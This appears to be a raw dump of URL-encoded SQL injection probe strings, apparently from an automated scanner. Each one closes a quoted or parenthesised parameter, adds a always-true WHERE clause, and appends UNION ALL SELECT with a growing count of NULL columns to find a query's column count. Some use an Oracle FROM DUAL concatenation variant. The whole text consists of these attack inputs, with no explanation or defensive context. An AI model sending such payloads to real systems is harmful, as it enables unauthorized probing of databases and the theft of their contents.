foo%22%29%20WHERE%209902%3D9902%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206451%3D6451%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%209183%3D9183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201372%3D1372%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%203718%3D3718%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%206860%3D6860%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%205128%3D5128%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%207284%3D7284%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201591%3D1591%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%204422%3D4422%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%207611%3D7611%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%209561%3D9561%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201905%3D1905%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%203607%3D3607%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206477%3D6477%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204686%3D4686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%203005%3D3005%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204664%3D4664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201898%3D1898%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206632%3D6632%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%209730%3D9730%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%209100%3D9100%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%202516%3D2516%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%206423%3D6423%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%201719%3D1719%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205683%3D5683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%206148%3D6148%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%201641%3D1641%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205243%3D5243%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%209774%3D9774%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207952%3D7952%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207784%3D7784%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205071%3D5071%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207768%3D7768%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%208966%3D8966%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207754%3D7754%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%201183%3D1183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%204573%3D4573%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209816%3D9816%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209490%3D9490%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%208194%3D8194%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207993%3D7993%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203142%3D3142%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27xixv%27%20FROM%20DUAL%20WHERE%203489%3D3489%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27jbXw%27%20FROM%20DUAL%20WHERE%207942%3D7942%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27ppgQ%27%20FROM%20DUAL%20WHERE%208702%3D8702%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27FMZe%27%20FROM%20DUAL%20WHERE%203421%3D3421%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 